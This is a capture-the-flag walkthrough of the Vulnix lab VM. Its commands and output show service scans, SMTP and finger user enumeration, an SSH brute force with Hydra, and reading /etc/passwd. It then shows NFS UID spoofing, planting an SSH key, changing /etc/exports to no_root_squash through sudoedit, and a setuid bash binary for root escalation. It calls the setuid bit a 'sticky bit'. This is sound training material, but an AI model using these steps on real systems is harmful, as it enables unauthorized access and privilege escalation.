HackLAB: Vulnix Walkthrough

Vulnix is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!)
The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. The details are as follows:
Architecture: x86
Format: VMware (vmx & vmdk) compatibility with version 4 onwards
RAM: 512MB
Network: NAT
Extracted size: 820MB
Compressed (download size): 194MB — 7zip format — 7zip can be obtained from here
MD5 Hash of Vulnix.7z: 0bf19d11836f72d22f30bf52cd585757
The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish — excluding the actual hacking of the vmdk
Free free to contact me with any questions/comments using the comments section below.
Enjoy!
Source: http://www.rebootuser.com/?p=933

Identify the IP address of Vulnix machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 11:50 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0030s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.10
Host is up (0.26s latency).
MAC Address: BC:9F:EF:69:35:19 (Unknown)
Nmap scan report for 192.168.1.11
Host is up (0.00033s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.12
Host is up (0.31s latency).
MAC Address: 04:56:04:47:D4:5C (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.16s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.33
Host is up (0.00039s latency).
MAC Address: 08:00:27:88:C9:95 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.34
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 10.64 seconds
root@kali:~#

Identify services running on Vulnix

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.33
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 11:51 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating ARP Ping Scan at 11:51
Scanning 192.168.1.33 [1 port]
Completed ARP Ping Scan at 11:51, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:51
Completed Parallel DNS resolution of 1 host. at 11:51, 0.01s elapsed
Initiating Connect Scan at 11:51
Scanning 192.168.1.33 [65535 ports]
Discovered open port 995/tcp on 192.168.1.33
Discovered open port 143/tcp on 192.168.1.33
Discovered open port 993/tcp on 192.168.1.33
Discovered open port 25/tcp on 192.168.1.33
Discovered open port 111/tcp on 192.168.1.33
Discovered open port 22/tcp on 192.168.1.33
Discovered open port 110/tcp on 192.168.1.33
Discovered open port 60351/tcp on 192.168.1.33
Discovered open port 513/tcp on 192.168.1.33
Discovered open port 2049/tcp on 192.168.1.33
Discovered open port 35544/tcp on 192.168.1.33
Discovered open port 514/tcp on 192.168.1.33
Discovered open port 79/tcp on 192.168.1.33
Discovered open port 56569/tcp on 192.168.1.33
Discovered open port 41281/tcp on 192.168.1.33
Discovered open port 44880/tcp on 192.168.1.33
Discovered open port 512/tcp on 192.168.1.33
Completed Connect Scan at 11:51, 2.84s elapsed (65535 total ports)
Initiating Service scan at 11:51
Scanning 17 services on 192.168.1.33
Completed Service scan at 11:52, 31.26s elapsed (17 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.33
NSE: Script scanning 192.168.1.33.
Initiating NSE at 11:52
Completed NSE at 11:52, 10.27s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.03s elapsed
Nmap scan report for 192.168.1.33
Host is up (0.00048s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=vulnix
| Issuer: commonName=vulnix
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:12
| Not valid after: 2022-08-31T17:40:12
| MD5: 58e3 f1ac fef6 b6d1 744c 836f ba24 4f0a
|_SHA-1: 712f 69ba 8c54 32e5 711c 898b 55ab 0a83 44a0 420b
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL STLS SASL RESP-CODES PIPELINING TOP CAPA
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 35544/tcp mountd
| 100005 1,2,3 41806/udp mountd
| 100021 1,3,4 44784/udp nlockmgr
| 100021 1,3,4 56569/tcp nlockmgr
| 100024 1 41281/tcp status
| 100024 1 59005/udp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID IDLE Pre-login listed LITERAL+ capabilities post-login ENABLE have OK more IMAP4rev1 LOGINDISABLEDA0001 SASL-IR STARTTLS LOGIN-REFERRALS
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
993/tcp open ssl/imap Dovecot imapd

|_imap-capabilities: ID IDLE listed LITERAL+ capabilities post-login ENABLE have OK more IMAP4rev1 Pre-login SASL-IR AUTH=PLAINA0001 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL USER SASL(PLAIN) RESP-CODES PIPELINING TOP CAPA
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2017-05-16T15:52:24+00:00; +2s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
35544/tcp open mountd 1-3 (RPC #100005)
41281/tcp open status 1 (RPC #100024)
44880/tcp open mountd 1-3 (RPC #100005)
56569/tcp open nlockmgr 1-4 (RPC #100021)
60351/tcp open mountd 1-3 (RPC #100005)

MAC Address: 08:00:27:88:C9:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Uptime guess: 0.001 days (since Tue May 16 11:51:37 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 192.168.1.33
NSE: Script Post-scanning.
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ 2s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.59 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)
root@kali:~#

Port 22 — Inspecting SSH — OpenSSH 5.9p1

No suitable exploits were found hence moving on.

Port 25 — Inspecting SMTP — Postfix smtpd

So we have successfully enumerated a list of users. Lets save that in a file.

root@kali:~/Desktop/B2R# cat users.txt
backup
bin
daemon
games
gnats
irc
libuuid
list
lp
mail
man
messagebus
news
nobody
postmaster
proxy
sshd
sync
sys
syslog
user
uucp
www-data
root@kali:~/Desktop/B2R#

Or we could use smtp-user-enum to do the same.

root@kali:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.33
Starting smtp-user-enum v1.2 (
http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 111
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue May 16 14:21:47 2017 #########
192.168.1.33: ROOT exists
192.168.1.33: backup exists
192.168.1.33: bin exists
192.168.1.33: daemon exists
192.168.1.33: games exists
192.168.1.33: gnats exists
192.168.1.33: irc exists
192.168.1.33: libuuid exists
192.168.1.33: list exists
192.168.1.33: lp exists
192.168.1.33: mail exists
192.168.1.33: man exists
192.168.1.33: messagebus exists
192.168.1.33: news exists
192.168.1.33: nobody exists
192.168.1.33: postmaster exists
192.168.1.33: proxy exists
192.168.1.33: root exists
192.168.1.33: sshd exists
192.168.1.33: sync exists
192.168.1.33: sys exists
192.168.1.33: syslog exists
192.168.1.33: user exists
192.168.1.33: uucp exists
192.168.1.33: www-data exists
######## Scan completed at Tue May 16 14:21:47 2017 #########
25 results.
111 queries in 1 seconds (111.0 queries / sec)
root@kali:~#

Port 79 — Inspecting Finger — Linux fingerd

root@kali:~/Desktop/B2R# git clone https://github.com/Kan1shka9/Finger-User-Enumeration.git
Cloning into 'Finger-User-Enumeration'...
remote: Counting objects: 12, done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 12 (delta 2), reused 3 (delta 0), pack-reused 0
Unpacking objects: 100% (12/12), done.
Checking connectivity... done.
root@kali:~/Desktop/B2R# cd Finger-User-Enumeration/
root@kali:~/Desktop/B2R/Finger-User-Enumeration# ls
finger_enum_user.sh README.md
root@kali:~/Desktop/B2R/Finger-User-Enumeration# ./finger_enum_user.sh
Script takes a file with a list of users as argument
Usage:
./finger_enum_user.sh <filename.txt>
root@kali:~/Desktop/B2R/Finger-User-Enumeration# ./finger_enum_user.sh ../users.txt
User :
No one logged on.
User : backup
Login: backup Name: backup
Directory: /var/backups Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : bin
Login: bin Name: bin
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : daemon
No one logged on.
Login: daemon                        Name: daemon
Directory: /usr/sbin Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
Login: usbmux                        Name: usbmux daemon
Directory: /var/lib/usbmux Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: avahi                         Name: Avahi mDNS daemon
Directory: /var/run/avahi-daemon Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: colord                  Name: colord colour management daemon
Directory: /var/lib/colord Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: pulse                         Name: PulseAudio daemon
Directory: /var/run/pulse Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : games
No one logged on.
Login: games                         Name: games
Directory: /usr/games Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : gnats
No one logged on.
Login: gnats              Name: Gnats Bug-Reporting System (admin)
Directory: /var/lib/gnats Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : irc
No one logged on.
Login: irc                           Name: ircd
Directory: /var/run/ircd Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : libuuid
Login: libuuid Name:
Directory: /var/lib/libuuid Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : list
Login: list Name: Mailing List Manager
Directory: /var/list Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : lp
Login: lp Name: lp
Directory: /var/spool/lpd Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : mail
Login: mail Name: mail
Directory: /var/mail Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: dovecot                       Name: Dovecot mail server
Directory: /usr/lib/dovecot Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : man
Login: man Name: man
Directory: /var/cache/man Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : messagebus
Login: messagebus Name:
Directory: /var/run/dbus Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : news
No one logged on.
Login: news                          Name: news
Directory: /var/spool/news Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : nobody
No one logged on.
Login: nobody                        Name: nobody
Directory: /nonexistent Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : postmaster
finger: postmaster: no such user.
User : proxy
Login: proxy Name: proxy
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : sshd
No one logged on.
Login: sshd                          Name:
Directory: /var/run/sshd Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : sync
No one logged on.
Login: sync                          Name: sync
Directory: /bin Shell: /bin/sync
Never logged in.
No mail.
No Plan.
User : sys
Login: sys Name: sys
Directory: /dev Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : syslog
Login: syslog Name:
Directory: /home/syslog Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : user
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Last login Tue May 16 01:47 (BST) on pts/0 from 192.168.1.34
No mail.
No Plan.
Login: dovenull                      Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : uucp
Login: uucp Name: uucp
Directory: /var/spool/uucp Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : www-data
Login: www-data Name: www-data
Directory: /var/www Shell: /bin/sh
Never logged in.
No mail.
No Plan.
root@kali:~/Desktop/B2R/Finger-User-Enumeration#

Port 111 — Enumerating RPC — rpcbind 2–4

RPC service is running, so we can enumerate further using rpcinfo.

root@kali:~# rpcinfo -p 192.168.1.33
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 59005 status
100024 1 tcp 41281 status
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 2 tcp 2049
100227 3 tcp 2049
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100227 2 udp 2049
100227 3 udp 2049
100021 1 udp 44784 nlockmgr
100021 3 udp 44784 nlockmgr
100021 4 udp 44784 nlockmgr
100021 1 tcp 56569 nlockmgr
100021 3 tcp 56569 nlockmgr
100021 4 tcp 56569 nlockmgr
100005 1 udp 58554 mountd
100005 1 tcp 60351 mountd
100005 2 udp 45706 mountd
100005 2 tcp 44880 mountd
100005 3 udp 41806 mountd
100005 3 tcp 35544 mountd
root@kali:~#

As NFS is running on port TCP and UDP port 2049

root@kali:~# nmap -sU -sT -p 2049 192.168.1.33
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 16:06 EDT
Nmap scan report for 192.168.1.33
Host is up (0.00035s latency).
PORT STATE SERVICE
2049/tcp open nfs
2049/udp open nfs

MAC Address: 08:00:27:88:C9:95 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
root@kali:~#

To inspect further we need to install nfs-common.

$ apt-cache search showmount
nfs-common - NFS support files common to client and server
$ apt-get install nfs-common

NFS Enumeration

root@kali:~# showmount -h
Usage: showmount [-adehv]
[--all] [--directories] [--exports]
[--no-headers] [--help] [--version] [host]
root@kali:~# showmount --exports 192.168.1.33
Export list for 192.168.1.33:
/home/vulnix *

Lets mount the remote share on our local machine.

root@kali:~# mkdir /tmp/nfs
root@kali:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs
root@kali:~# cd /tmp/nfs
-bash: cd: /tmp/nfs: Permission denied
root@kali:~#

We get a Permission denied on the mounted share. After a bit of googling we find out that root squashing is enabled. You can read more about root squashing here and here.

Lets try and break into the machine by brute forcing the ssh password for the user user.

root@kali:~# hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.1.33 ssh -t 4
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-16 18:04:07
[DATA] max 4 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~56032 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344335 to do in 3735:31h, 4 active
[STATUS] 61.33 tries/min, 184 tries in 00:03h, 14344215 to do in 3897:54h, 4 active
[STATUS] 60.57 tries/min, 424 tries in 00:07h, 14343975 to do in 3946:51h, 4 active
[22][ssh] host: 192.168.1.33 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-16 18:12:43
root@kali:~#

Now that we have the SSH username and the password lets try and login to the machine.

root@kali:~# ssh user@192.168.1.33
user@192.168.1.33's password: letmein
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation:  https://help.ubuntu.com/
System information as of Tue May 16 20:58:15 BST 2017
System load:  0.07             Processes:           86
Usage of /: 90.4% of 773MB Users logged in: 0
Memory usage: 10% IP address for eth0: 192.168.1.33
Swap usage: 0%
=> / is using 90.4% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue May 16 20:33:51 2017 from 192.168.1.34
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ sudo -l

[sudo] password for user:
Sorry, user user may not run sudo on vulnix.
user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:~$

Unfortunately our user is not one of the sudoers. But the good thing is we have the UID and GID of the user vulnix. So now we can create a user vulnix on our local machine with the UID 2008 and try accessing the mounted share /tmp/nfs/.

root@kali:~# useradd -u 2008 vulnix
root@kali:~# tail -1 /etc/passwd

vulnix:x:2008:2008::/home/vulnix:/bin/sh
root@kali:~# su vulnix
$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
$ cd /tmp/nfs
$ ls -la
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 .
drwxrwxrwt 15 root root 4096 May 16 18:17 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
$ pwd
/tmp/nfs

Now lets gain SSH access to vulnix by copying out SSH keys onto /tmp/nfs.

Generate SSH keys

root@kali:~# ls /root/.ssh/
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:VoZMUJiHramBTJnCofq3Osa2s3JaFFJP0yct0V5KKwU root@kali
The key's randomart image is:
+---[RSA 2048]----+
|..ooo.E%o |
|oo+o .BoO.. |
|o+... @o+o |
|..o.. + +o |
|. . o .S |
| o . . |
| .o . |
|..B. . |
|.*+*. |
+----[SHA256]-----+
root@kali:~# ls /root/.ssh/
id_rsa id_rsa.pub
root@kali:~# cat /root/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC42NpxutFyfjQuOtZRiHzS/HRgCDQZZrrmizKrLmnhWy4RbzMqFc/URB22QtHkQLnX4libQkGKaSce2bEE2mF0DKB8oX/O9L+J7BYf5d7C6UQ1fLXN1Tg3Ls4QbKBrQGKPH14rdmzSe+ESKc5fE+cvBhB7f8Ub4HnZTDhLCSLJoyzNf85BkU/QjjWymxEXaoSDhg9vPgXEeQAAUCikkpcTwE5PVGG8z+m1fR0OZnzm45sfe2b+NI18owH60oGm8n8O6jOivsvlohXpNrcCm2Ago994zVA4V9ntPd6owXb77Wu1w8Zz1x1dK79QvIook18B6SIhnjJWyFgxHox2Gg8F root@kali
root@kali:~#

Copy public SSH keys over to the vulnix.

root@kali:~# su vulnix
$ cd /tmp/nfs
$ ls -la

total 20
drwxr-x--- 2 vulnix vulnix 4096 May 16 16:25 .
drwxrwxrwt 15 root root 4096 May 16 18:36 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
$ mkdir .ssh
$ cd .ssh
$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC42NpxutFyfjQuOtZRiHzS/HRgCDQZZrrmizKrLmnhWy4RbzMqFc/URB22QtHkQLnX4libQkGKaSce2bEE2mF0DKB8oX/O9L+J7BYf5d7C6UQ1fLXN1Tg3Ls4QbKBrQGKPH14rdmzSe+ESKc5fE+cvBhB7f8Ub4HnZTDhLCSLJoyzNf85BkU/QjjWymxEXaoSDhg9vPgXEeQAAUCikkpcTwE5PVGG8z+m1fR0OZnzm45sfe2b+NI18owH60oGm8n8O6jOivsvlohXpNrcCm2Ago994zVA4V9ntPd6owXb77Wu1w8Zz1x1dK79QvIook18B6SIhnjJWyFgxHox2Gg8F root@kali > authorized_keys

Lets login to vulnix

root@kali:~# ssh vulnix@192.168.1.33
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation:  https://help.ubuntu.com/
System information as of Tue May 16 21:42:24 BST 2017
System load:  0.0              Processes:           86
Usage of /: 90.4% of 773MB Users logged in: 0
Memory usage: 10% IP address for eth0: 192.168.1.33
Swap usage: 0%
=> / is using 90.4% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue May 16 21:35:17 2017 from 192.168.1.34
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$

The above output shows that vulnix is one of the sudoers. He can execute sudoedit /etc/exports as root. So we can disable root squashing. We can do so by replacing root_squash with no_root_squash.

vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
vulnix@vulnix:~$ sudoedit /etc/exports
vulnix@vulnix:~$ cat /etc/exports

# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,no_root_squash)
vulnix@vulnix:~$

Unmount /tmp/nfs

root@kali:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1021936 0 1021936 0% /dev
tmpfs 206880 6376 200504 4% /run
/dev/sda1 39088480 10388040 26691816 29% /
tmpfs 1034392 304 1034088 1% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 1034392 0 1034392 0% /sys/fs/cgroup
tmpfs 206876 28 206848 1% /run/user/132
tmpfs 206876 20 206856 1% /run/user/0
192.168.1.33:/home/vulnix 792064 715840 36480 96% /tmp/nfs
root@kali:~# umount /tmp/nfs
root@kali:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1021936 0 1021936 0% /dev
tmpfs 206880 6372 200508 4% /run
/dev/sda1 39088480 10388040 26691816 29% /
tmpfs 1034392 304 1034088 1% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 1034392 0 1034392 0% /sys/fs/cgroup
tmpfs 206876 28 206848 1% /run/user/132
tmpfs 206876 20 206856 1% /run/user/0
root@kali:~#

As we have limited access we have to hard reboot the vulnix machine to restart NFS.

In the mean time remount the nfs share, copy over /bin/bash of our local machine to /tmp/nfs. Add sticky bit for bash.

root@kali:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs
root@kali:~# cp /bin/bash /tmp/nfs/
root@kali:~# cd /tmp/nfs/
root@kali:/tmp/nfs# ls -la

total 1116
drwxr-x--- 4 vulnix vulnix 4096 May 16 19:18 .
drwxrwxrwt 13 root root 4096 May 16 19:45 ..
-rwxr-xr-x 1 root root 1109604 May 16 19:18 bash
-rw------- 1 vulnix vulnix 13 May 16 16:41 .bash_history
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx------ 2 vulnix vulnix 4096 May 16 16:35 .cache
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 May 16 16:35 .ssh
root@kali:/tmp/nfs# chmod 4777 bash
